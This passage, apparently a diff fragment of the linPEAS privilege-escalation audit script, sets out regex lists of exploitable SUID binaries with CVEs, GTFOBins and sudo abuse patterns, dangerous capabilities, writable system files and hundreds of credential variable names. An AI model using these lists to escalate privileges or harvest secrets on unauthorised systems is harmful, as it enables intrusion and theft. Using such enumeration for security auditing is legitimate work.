+sidG4="/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/ulog-helper$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/VBoxHeadless$|/VBoxNetAdpCtl$|/VBoxNetDHCP$|/VBoxNetNAT$|/VBoxSDL$|/VBoxVolInfo$|/VirtualBoxVM$|/vmstat$|/vmware-authd$|/vmware-user-suid-wrapper$|/vmware-vmx$|/vmware-vmx-debug$|/vmware-vmx-stats$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$|/yppasswd$" + +#Rules: Start path " /", end path "$", divide path and vulnversion "%". SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION +sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ + /at$%RTru64_UNIX_4.0g\(CVE-2002-1614\)\ + /abrt-action-install-debuginfo-to-abrt-cache$%CENTOS 7.1/Fedora22 + /chfn$%SuSE_9.3/10\ + /chkey$%Solaris_2.5.1\ + /chkperm$%Solaris_7.0_\ + /chpass$%2Vulns:OpenBSD_6.1_to_OpenBSD 6.6\(CVE-2019-19726\)--OpenBSD_2.7_i386/OpenBSD_2.6_i386/OpenBSD_2.5_1999/08/06/OpenBSD_2.5_1998/05/28/FreeBSD_4.0-RELEASE/FreeBSD_3.5-RELEASE/FreeBSD_3.4-RELEASE/NetBSD_1.4.2\ + /chpasswd$%SquirrelMail\(2004-04\)\ + /dtappgather$%Solaris_7_<_11_\(SPARC/x86\)\(CVE-2017-3622\)\ + /dtprintinfo$%Solaris_10_\(x86\)_and_lower_versions_also_SunOS_5.7_to_5.10\ + /dtsession$%Oracle_Solaris_10_1/13_and_earlier\(CVE-2020-2696\)\ + /eject$%FreeBSD_mcweject_0.9/SGI_IRIX_6.2\ + /ibstat$%IBM_AIX_Version_6.1/7.1\(09-2013\)\ + /kcheckpass$%KDE_3.2.0_<-->_3.4.2_\(both_included\)\ + /kdesud$%KDE_1.1/1.1.1/1.1.2/1.2\ + /keybase-redirector%CentOS_Linux_release_7.4.1708\ + /login$%IBM_AIX_3.2.5/SGI_IRIX_6.4\ + /lpc$%S.u.S.E_Linux_5.2\ + /lpr$%BSD/OS2.1/FreeBSD2.1.5/NeXTstep4.x/IRIX6.4/SunOS4.1.3/4.1.4\(09-1996\)\ + /mail.local$%NetBSD_7.0-7.0.1__6.1-6.1.5__6.0-6.0.6 + /mount$%Apple_Mac_OSX\(Lion\)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8\ + /movemail$%Emacs\(08-1986\)\ + /mrinfo$%NetBSD_Sep_17_2002_https://securitytracker.com/id/1005234\ + /mtrace$%NetBSD_Sep_17_2002_https://securitytracker.com/id/1005234\ + /netprint$%IRIX_5.3/6.2/6.3/6.4/6.5/6.5.11\ + /newgrp$%HP-UX_10.20\ + /ntfs-3g$%Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others\(02-2017\)\ + /passwd$%Apple_Mac_OSX\(03-2006\)/Solaris_8/9\(12-2004\)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1\(02-1997\)\ + /pkexec$%Linux4.10_to_5.1.17\(CVE-2019-13272\)/rhel_6\(CVE-2011-1485\)\ + /pppd$%Apple_Mac_OSX_10.4.8\(05-2007\)\ + /pt_chown$%GNU_glibc_2.1/2.1.1_-6\(08-1999\)\ + /pulseaudio$%\(Ubuntu_9.04/Slackware_12.2.0\)\ + /rcp$%RedHat_6.2\ + /rdist$%Solaris_10/OpenSolaris\ + /rsh$%Apple_Mac_OSX_10.9.5/10.10.5\(09-2015\)\ + /screen$%GNU_Screen_4.5.0\ + /sdtcm_convert$%Sun_Solaris_7.0\ + /sendmail$%Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_\(SGI_ProPack_1.2/1.3\)\ + /snap-confine$%Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation\(CVE-2019-7304\)\ + /sudo%check_if_the_sudo_version_is_vulnerable\ + /Serv-U%FTP_Server<15.1.7(CVE-2019-12181) + /sudoedit$%Sudo/SudoEdit_1.6.9p21/1.7.2p4/\(RHEL_5/6/7/Ubuntu\)/Sudo<=1.8.14\ + /tmux$%Tmux_1.3_1.4_privesc\(CVE-2011-1496\)\ + /traceroute$%LBL_Traceroute_\[2000-11-15\]\ + /ubuntu-core-launcher$%Befre_1.0.27.1\(CVE-2016-1580\)\ + /umount$%BSD/Linux\(08-1996\)\ + /umount-loop$%Rocks_Clusters<=4.1\(07-2006\)\ + /uucp$%Taylor_UUCP_1.0.6\ + /XFree86$%XFree86_X11R6_3.3.x/4.0/4.x/3.3\(03-2003\)\ + /xlock$%BSD/OS_2.1/DG/UX_7.0/Debian_1.3/HP-UX_10.34/IBM_AIX_4.2/SGI_IRIX_6.4/Solaris_2.5.1\(04-1997\)\ + /xscreensaver%Solaris_11.x\(CVE-2019-3010\)\ + /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ + /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" +#To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|' +sidVB='/apt-get$|/apt$|/ar$|/aria2c$|/arp$|/ash$|/at$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bpftrace$|/bridge$|/bundler$|/busctl$|/busybox$|/byebug$|/cancel$|/capsh$|/cat$|/certbot$|/check_by_ssh$|/check_cups$|/check_log$|/check_memory$|/check_raid$|/check_ssl_cert$|/check_statusfile$|/chmod$|/chown$|/chroot$|/cobc$|/column$|/comm$|/composer$|/cowsay$|/cowthink$|/cp$|/cpan$|/cpio$|/cpulimit$|/crash$|/crontab$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmesg$|/dmsetup$|/dnf$|/docker$|/dpkg$|/dvips$|/easy_install$|/eb$|/ed$|/emacs$|/env$|/eqn$|/ex$|/exiftool$|/expand$|/expect$|/facter$|/file$|/find$|/finger$|/flock$|/fmt$|/fold$|/ftp$|/gawk$|/gcc$|/gdb$|/gem$|/genisoimage$|/ghc$|/ghci$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/irb$|/jjs$|/join$|/journalctl$|/jq$|/jrunscript$|/ksh$|/ksshell$' +sidVB2='/latex$|/ld$|/ldconfig$|/less$|/logsave$|/look$|/ltrace$|/lua$|/lualatex$|/luatex$|/lwp-download$|/lwp-request$|/mail$|/make$|/man$|/mawk$|/more$|/mount$|/mtr$|/mv$|/mysql$|/nano$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/npm$|/nroff$|/nsenter$|/octave$|/od$|/openssl$|/openvpn$|/openvt$|/paste$|/pdb$|/pdflatex$|/pdftex$|/perl$|/pg$|/php$|/pic$|/pico$|/pip$|/pkexec$|/pkg$|/pr$|/pry$|/psql$|/puppet$|/python$|/rake$|/readelf$|/red$|/redcarpet$|/restic$|/rev$|/rlogin$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/ruby$|/run-mailcap$|/run-parts$|/rview$|/rvim$|/scp$|/screen$|/script$|/sed$|/service$|/setarch$|/sftp$|/sg$|/shuf$|/slsh$|/smbclient$|/snap$|/socat$|/soelim$|/sort$|/split$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/ssh$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/su$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tcpdump$|/tee$|/telnet$|/tex$|/tftp$|/time$|/timeout$|/tmux$|/top$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/valgrind$|/vi$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/virsh$|/watch$|/wc$|/wget$|/whois$|/wish$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xxd$|/xz$|/yelp$|/yum$|/zip$|/zsh$|/zsoelim$|/zypper$' +cfuncs='file|free|main|more|read|split|write' + +sudoVB=" \*|env_keep\+=LD_PRELOAD|apt-get$|apt$|aria2c$|arp$|ash$|awk$|base64$|bash$|busybox$|cat$|chmod$|chown$|cp$|cpan$|cpulimit$|crontab$|csh$|curl$|cut$|dash$|date$|dd$|diff$|dmesg$|dmsetup$|dnf$|docker$|dpkg$|easy_install$|ed$|emacs$|env$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gdb$|gimp$|git$|grep$|head$|ionice$|ip$|irb$|jjs$|journalctl$|jq$|jrunscript$|ksh$|ld.so$|less$|logsave$|ltrace$|lua$|mail$|make$|man$|more$|mount$|mtr$|mv$|mysql$|nano$|nc$|nice$|nl$|nmap$|node$|od$|openssl$|perl$|pg$|php$|pic$|pico$|pip$|puppet$|python$|readelf$|red$|rlwrap$|rpm$|rpmquery$|rsync$|ruby$|run-mailcap$|run-parts$|rvim$|scp$|screen$|script$|sed$|service$|setarch$|sftp$|smbclient$|socat$|sort$|sqlite3$|ssh$|start-stop-daemon$|stdbuf$|strace$|systemctl$|tail$|tar$|taskset$|tclsh$|tcpdump$|tee$|telnet$|tftp$|time$|timeout$|tmux$|ul$|unexpand$|uniq$|unshare$|vi$|vim$|watch$|wget$|wish$|xargs$|xxd$|yum$|zip$|zsh$|zypper$" +sudoB="$(whoami)|ALL:ALL|ALL : ALL|ALL|NOPASSWD|SETENV|/apache2|/cryptsetup|/mount" +sudoG="NOEXEC" + +sudocapsB="/apt-get|/apt|/aria2c|/arp|/ash|/awk|/base64|/bash|/busybox|/cat|/chmod|/chown|/cp|/cpan|/cpulimit|/crontab|/csh|/curl|/cut|/dash|/date|/dd|/diff|/dmesg|/dmsetup|/dnf|/docker|/dpkg|/easy_install|/ed|/emacs|/env|/expand|/expect|/facter|/file|/find|/flock|/fmt|/fold|/ftp|/gdb|/gimp|/git|/grep|/head|/ionice|/ip|/irb|/jjs|/journalctl|/jq|/jrunscript|/ksh|/ld.so|/less|/logsave|/ltrace|/lua|/mail|/make|/man|/more|/mount|/mtr|/mv|/mysql|/nano|/nc|/nice|/nl|/nmap|/node|/od|/openssl|/perl|/pg|/php|/pic|/pico|/pip|/puppet|/python|/readelf|/red|/rlwrap|/rpm|/rpmquery|/rsync|/ruby|/run-mailcap|/run-parts|/rvim|/scp|/screen|/script|/sed|/service|/setarch|/sftp|/smbclient|/socat|/sort|/sqlite3|/ssh|/start-stop-daemon|/stdbuf|/strace|/systemctl|/tail|/tar|/taskset|/tclsh|/tcpdump|/tee|/telnet|/tftp|/time|/timeout|/tmux|/ul|/unexpand|/uniq|/unshare|/vi|/vim|/watch|/wget|/wish|/xargs|/xxd|/yum|/zip|/zsh|/zypper" +capsB="=ep|cap_chown|cap_dac_override|cap_dac_read_search|cap_setuid|sys_admin|sys_ptrace|sys_module" +containercapsB="sys_admin|sys_ptrace|sys_module|dac_read_search|dac_override" + +OLDPATH=$PATH +ADDPATH=":/usr/local/sbin\ + :/usr/local/bin\ + :/usr/sbin\ + :/usr/bin\ + :/sbin\ + :/bin" +spath=":$PATH" +for P in $ADDPATH; do + if [ ! -z "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi +done + +# test if sed supports -E or -r +E=E +echo | sed -${E} 's/o/a/' 2>/dev/null +if [ $? -ne 0 ] ; then + echo | sed -r 's/o/a/' 2>/dev/null + if [ $? -eq 0 ] ; then + E=r + else + echo "${YELLOW}WARNING: No suitable option found for extended regex with sed. Continuing but the results might be unreliable.${NC}" + fi +fi + +writeB="00-header|10-help-text|50-motd-news|80-esm|91-release-upgrade|\.sh$|\./|/authorized_keys|/bin/|/boot/|/etc/apache2/apache2.conf|/etc/apache2/httpd.conf|/etc/hosts.allow|/etc/hosts.deny|/etc/httpd/conf/httpd.conf|/etc/httpd/httpd.conf|/etc/inetd.conf|/etc/incron.conf|/etc/login.defs|/etc/logrotate.d/|/etc/modprobe.d/|/etc/pam.d/|/etc/php.*/fpm/pool.d/|/etc/php/.*/fpm/pool.d/|/etc/rsyslog.d/|/etc/skel/|/etc/sysconfig/network-scripts/|/etc/sysctl.conf|/etc/sysctl.d/|/etc/uwsgi/apps-enabled/|/etc/xinetd.conf|/etc/xinetd.d/|/etc/|/home//|/lib/|/log/|/mnt/|/root|/sys/|/usr/bin|/usr/games|/usr/lib|/usr/local/bin|/usr/local/games|/usr/local/sbin|/usr/sbin|/sbin/|/var/log/|\.timer$|\.service$|.socket$" +writeVB="/etc/anacrontab|/etc/bash.bashrc|/etc/bash_completion|/etc/bash_completion.d/|/etc/cron|/etc/environment|/etc/environment.d/|/etc/group|/etc/incron.d/|/etc/init|/etc/ld.so.conf.d/|/etc/master.passwd|/etc/passwd|/etc/profile.d/|/etc/profile|/etc/rc.d|/etc/shadow|/etc/skey/|/etc/sudoers|/etc/sudoers.d/|/etc/supervisor/conf.d/|/etc/supervisor/supervisord.conf|/etc/systemd|/etc/sys|/lib/systemd|/etc/update-motd.d/|/root/.ssh/|/run/systemd|/usr/lib/systemd|/systemd/system|/var/db/yubikey/|/var/spool/anacron|/var/spool/cron/crontabs|"`echo $PATH 2>/dev/null | sed 's/:\.:/:/g' | sed 's/:\.$//g' | sed 's/^\.://g' | sed 's/:/$|^/g'` #Add Path but remove simple dot in PATH + +if [ "$MACPEAS" ]; then + sh_usrs="ImPoSSssSiBlEee" + nosh_usrs="ImPoSSssSiBlEee" + dscl . list /Users | while read uname; do + ushell=`dscl . -read "/Users/$uname" UserShell | cut -d " " -f2` + if [ "`grep \"$ushell\" /etc/shells`" ]; then sh_usrs="$sh_usrs|$uname"; else nosh_usrs="$nosh_usrs|$uname"; fi + done +else + sh_usrs=`cat /etc/passwd 2>/dev/null | grep -v "^root:" | grep -i "sh$" | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/' | sed 's/|sys|/|sys[\\\s:]|^sys$|/' | sed 's/|daemon|/|daemon[\\\s:]|^daemon$|/'`"ImPoSSssSiBlEee" #Modified bin, sys and daemon so they are not colored everywhere + nosh_usrs=`cat /etc/passwd 2>/dev/null | grep -i -v "sh$" | sort | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/'`"ImPoSSssSiBlEee" +fi +knw_usrs='daemon\W|^daemon$|message\+|syslog|www|www-data|mail|noboby|Debian\-\+|rtkit|systemd\+' +USER=`whoami 2>/dev/null || echo "UserUnknown"` +if [ ! "$HOME" ]; then + if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home + else HOME="/home/$USER"; + fi +fi +Groups="ImPoSSssSiBlEee"`groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|'` + +#This variables are dived in several different ones because NetBSD required it +pwd_inside_history="7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|root|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|xfreerdp|^ssh|steghide|@" + +pwd_in_variables1="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID" +pwd_in_variables2="AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID" +pwd_in_variables3="CHROME_CLIENT_SECRET|CHROME_EXTENSION_ID|CHROME_REFRESH_TOKEN|CI_DEPLOY_USER|CI_NAME|CI_PROJECT_NAMESPACE|CI_PROJECT_URL|CI_REGISTRY_USER|CI_SERVER_NAME|CI_USER_TOKEN|CLAIMR_DATABASE|CLAIMR_DB|CLAIMR_SUPERUSER|CLAIMR_TOKEN|CLIENT_ID|CLIENT_SECRET|CLI_E2E_CMA_TOKEN|CLI_E2E_ORG_ID|CLOUDAMQP_URL|CLOUDANT_APPLIANCE_DATABASE|CLOUDANT_ARCHIVED_DATABASE|CLOUDANT_AUDITED_DATABASE|CLOUDANT_DATABASE|CLOUDANT_ORDER_DATABASE|CLOUDANT_PARSED_DATABASE|CLOUDANT_PROCESSED_DATABASE|CLOUDANT_SERVICE_DATABASE|CLOUDFLARE_API_KEY|CLOUDFLARE_AUTH_EMAIL|CLOUDFLARE_AUTH_KEY|CLOUDFLARE_EMAIL|CLOUDFLARE_ZONE_ID|CLOUDINARY_URL|CLOUDINARY_URL_EU|CLOUDINARY_URL_STAGING|CLOUD_API_KEY|CLUSTER_NAME|CLU_REPO_URL|CLU_SSH_PRIVATE_KEY_BASE64|CN_ACCESS_KEY_ID|CN_SECRET_ACCESS_KEY|COCOAPODS_TRUNK_EMAIL|COCOAPODS_TRUNK_TOKEN|CODACY_PROJECT_TOKEN|CODECLIMATE_REPO_TOKEN|CODECOV_TOKEN|coding_token|CONEKTA_APIKEY|CONFIGURATION_PROFILE_SID|CONFIGURATION_PROFILE_SID_P2P|CONFIGURATION_PROFILE_SID_SFU|CONSUMERKEY|CONSUMER_KEY|CONTENTFUL_ACCESS_TOKEN|CONTENTFUL_CMA_TEST_TOKEN|CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN|CONTENTFUL_INTEGRATION_SOURCE_SPACE|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN_NEW|CONTENTFUL_ORGANIZATION" +pwd_in_variables4="CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN|CONTENTFUL_TEST_ORG_CMA_TOKEN|CONTENTFUL_V2_ACCESS_TOKEN|CONTENTFUL_V2_ORGANIZATION|CONVERSATION_URL|COREAPI_HOST|COS_SECRETS|COVERALLS_API_TOKEN|COVERALLS_REPO_TOKEN|COVERALLS_SERVICE_NAME|COVERALLS_TOKEN|COVERITY_SCAN_NOTIFICATION_EMAIL|COVERITY_SCAN_TOKEN|CYPRESS_RECORD_KEY|DANGER_GITHUB_API_TOKEN|DATABASE_HOST|DATABASE_NAME|DATABASE_PORT|DATABASE_USER|datadog_api_key|datadog_app_key|DB_CONNECTION|DB_DATABASE|DB_HOST|DB_PORT|DB_PW|DB_USER|DDGC_GITHUB_TOKEN|DDG_TEST_EMAIL|DDG_TEST_EMAIL_PW|DEPLOY_DIR|DEPLOY_DIRECTORY|DEPLOY_HOST|DEPLOY_PORT|DEPLOY_SECURE|DEPLOY_TOKEN|DEPLOY_USER|DEST_TOPIC|DHL_SOLDTOACCOUNTID|DH_END_POINT_1|DH_END_POINT_2|DIGITALOCEAN_ACCESS_TOKEN|DIGITALOCEAN_SSH_KEY_BODY|DIGITALOCEAN_SSH_KEY_IDS|DOCKER_EMAIL|DOCKER_KEY|DOCKER_PASSDOCKER_POSTGRES_URL|DOCKER_RABBITMQ_HOST|docker_repo|DOCKER_TOKEN|DOCKER_USER|DOORDASH_AUTH_TOKEN|DROPBOX_OAUTH_BEARER|ELASTICSEARCH_HOST|ELASTIC_CLOUD_AUTH|env.GITHUB_OAUTH_TOKEN|env.HEROKU_API_KEY|ENV_KEY|ENV_SECRET|ENV_SECRET_ACCESS_KEY|eureka.awsAccessId" +pwd_in_variables5="eureka.awsSecretKey|ExcludeRestorePackageImports|EXPORT_SPACE_ID|FIREBASE_API_JSON|FIREBASE_API_TOKEN|FIREBASE_KEY|FIREBASE_PROJECT|FIREBASE_PROJECT_DEVELOP|FIREBASE_PROJECT_ID|FIREBASE_SERVICE_ACCOUNT|FIREBASE_TOKEN|FIREFOX_CLIENT|FIREFOX_ISSUER|FIREFOX_SECRET|FLASK_SECRET_KEY|FLICKR_API_KEY|FLICKR_API_SECRET|FOSSA_API_KEY|ftp_host|FTP_LOGIN|FTP_PW|FTP_USER|GCLOUD_BUCKET|GCLOUD_PROJECT|GCLOUD_SERVICE_KEY|GCS_BUCKET|GHB_TOKEN|GHOST_API_KEY|GH_API_KEY|GH_EMAIL|GH_NAME|GH_NEXT_OAUTH_CLIENT_ID|GH_NEXT_OAUTH_CLIENT_SECRET|GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID|GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET|GH_OAUTH_CLIENT_ID|GH_OAUTH_CLIENT_SECRET|GH_OAUTH_TOKEN|GH_REPO_TOKEN|GH_TOKEN|GH_UNSTABLE_OAUTH_CLIENT_ID|GH_UNSTABLE_OAUTH_CLIENT_SECRET|GH_USER_EMAIL|GH_USER_NAME|GITHUB_ACCESS_TOKEN|GITHUB_API_KEY|GITHUB_API_TOKEN|GITHUB_AUTH|GITHUB_AUTH_TOKEN|GITHUB_AUTH_USER|GITHUB_CLIENT_ID|GITHUB_CLIENT_SECRET|GITHUB_DEPLOYMENT_TOKEN|GITHUB_DEPLOY_HB_DOC_PASS|GITHUB_HUNTER_TOKEN|GITHUB_KEY|GITHUB_OAUTH|GITHUB_OAUTH_TOKEN|GITHUB_RELEASE_TOKEN|GITHUB_REPO|GITHUB_TOKEN|GITHUB_TOKENS|GITHUB_USER|GITLAB_USER_EMAIL|GITLAB_USER_LOGIN|GIT_AUTHOR_EMAIL|GIT_AUTHOR_NAME|GIT_COMMITTER_EMAIL|GIT_COMMITTER_NAME|GIT_EMAIL|GIT_NAME|GIT_TOKEN|GIT_USER" +pwd_in_variables6="GOOGLE_CLIENT_EMAIL|GOOGLE_CLIENT_ID|GOOGLE_CLIENT_SECRET|GOOGLE_MAPS_API_KEY|GOOGLE_PRIVATE_KEY|gpg.passphrase|GPG_EMAIL|GPG_ENCRYPTION|GPG_EXECUTABLE|GPG_KEYNAME|GPG_KEY_NAME|GPG_NAME|GPG_OWNERTRUST|GPG_PASSPHRASE|GPG_PRIVATE_KEY|GPG_SECRET_KEYS|gradle.publish.key|gradle.publish.secret|GRADLE_SIGNING_KEY_ID|GREN_GITHUB_TOKEN|GRGIT_USER|HAB_AUTH_TOKEN|HAB_KEY|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|HEROKU_API_KEY|HEROKU_API_USER|HEROKU_EMAIL|HEROKU_TOKEN|HOCKEYAPP_TOKEN|INTEGRATION_TEST_API_KEY|INTEGRATION_TEST_APPID|INTERNAL-SECRETS|IOS_DOCS_DEPLOY_TOKEN|IRC_NOTIFICATION_CHANNEL|JDBC:MYSQL|jdbc_databaseurl|jdbc_host|jdbc_user|JWT_SECRET|KAFKA_ADMIN_URL|KAFKA_INSTANCE_NAME|KAFKA_REST_URL|KEYSTORE_PASS|KOVAN_PRIVATE_KEY|LEANPLUM_APP_ID|LEANPLUM_KEY|LICENSES_HASH|LICENSES_HASH_TWO|LIGHTHOUSE_API_KEY|LINKEDIN_CLIENT_ID|LINKEDIN_CLIENT_SECRET|LINODE_INSTANCE_ID|LINODE_VOLUME_ID|LINUX_SIGNING_KEY|LL_API_SHORTNAME|LL_PUBLISH_URL|LL_SHARED_KEY|LOOKER_TEST_RUNNER_CLIENT_ID|LOOKER_TEST_RUNNER_CLIENT_SECRET|LOOKER_TEST_RUNNER_ENDPOINT|LOTTIE_HAPPO_API_KEY|LOTTIE_HAPPO_SECRET_KEY|LOTTIE_S3_API_KEY|LOTTIE_S3_SECRET_KEY|mailchimp_api_key|MAILCHIMP_KEY|mailchimp_list_id|mailchimp_user|MAILER_HOST|MAILER_TRANSPORT|MAILER_USER" +pwd_in_variables7="MAILGUN_APIKEY|MAILGUN_API_KEY|MAILGUN_DOMAIN|MAILGUN_PRIV_KEY|MAILGUN_PUB_APIKEY|MAILGUN_PUB_KEY|MAILGUN_SECRET_API_KEY|MAILGUN_TESTDOMAIN|ManagementAPIAccessToken|MANAGEMENT_TOKEN|MANAGE_KEY|MANAGE_SECRET|MANDRILL_API_KEY|MANIFEST_APP_TOKEN|MANIFEST_APP_URL|MapboxAccessToken|MAPBOX_ACCESS_TOKEN|MAPBOX_API_TOKEN|MAPBOX_AWS_ACCESS_KEY_ID|MAPBOX_AWS_SECRET_ACCESS_KEY|MG_API_KEY|MG_DOMAIN|MG_EMAIL_ADDR|MG_EMAIL_TO|MG_PUBLIC_API_KEY|MG_SPEND_MONEY|MG_URL|MH_APIKEY|MILE_ZERO_KEY|MINIO_ACCESS_KEY|MINIO_SECRET_KEY|MYSQLMASTERUSER|MYSQLSECRET|MYSQL_DATABASE|MYSQL_HOSTNAMEMYSQL_USER|MY_SECRET_ENV|NETLIFY_API_KEY|NETLIFY_SITE_ID|NEW_RELIC_BETA_TOKEN|NGROK_AUTH_TOKEN|NGROK_TOKEN|node_pre_gyp_accessKeyId|NODE_PRE_GYP_GITHUB_TOKEN|node_pre_gyp_secretAccessKey|NPM_API_KEY|NPM_API_TOKEN|NPM_AUTH_TOKEN|NPM_EMAIL|NPM_SECRET_KEY|NPM_TOKEN|NUGET_APIKEY|NUGET_API_KEY|NUGET_KEY|NUMBERS_SERVICE|NUMBERS_SERVICE_PASS|NUMBERS_SERVICE_USER|OAUTH_TOKEN|OBJECT_STORAGE_PROJECT_ID|OBJECT_STORAGE_USER_ID|OBJECT